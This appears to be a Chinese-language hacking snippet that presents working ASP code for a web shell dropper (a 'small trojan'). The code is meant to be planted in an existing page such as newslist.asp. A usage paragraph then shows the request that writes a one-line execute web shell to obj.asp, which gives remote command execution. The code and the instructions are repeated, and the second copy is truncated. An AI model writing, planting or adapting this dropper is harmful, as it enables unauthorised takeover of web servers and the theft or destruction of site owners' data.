同目录下生成一个asp小马
<%
On Error Resume Next
IF Request("action")="ocean" then
set gl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("shellcode")
gl.SaveToFile server.mappath(request("shellpath")),2
gl.Close
set gl=nothing
response.redirect request("shellpath")
end if
%>
--------------------------------------------------------------------------------
使用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?action=ocean&shellcode=<%25execute request("show")%25>&shellpath=obj.asp,那么我们就可以在与newslist.asp同目录下生成一个obj.asp的文件,内容为“<%execute request("show")%>”,于是我们只要改变shellcode的内容,就可以得到一个shell.
On Error Resume Next
IF Request("action")="ocean" then
set gl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("shellcode")
gl.SaveToFile server.mappath(request("shellpath")),2
gl.Close
set gl=nothing
response.redirect request("shellpath")
end if
%>
--------------------------------------------------------------------------------
使用方法如下:比如我们将这些代码放到newslist.asp里,那么只要我们输入newslist.asp?action=ocean&shellcode=<%25execute request("show")%25>&shellpath=obj.asp,那么我们就可以在与newslist.asp同目录下生成一个obj.asp的文件,内容为“<%execute request("show")%>”,于是我们只要改变shellcode的内容,就可以得到一个shell.
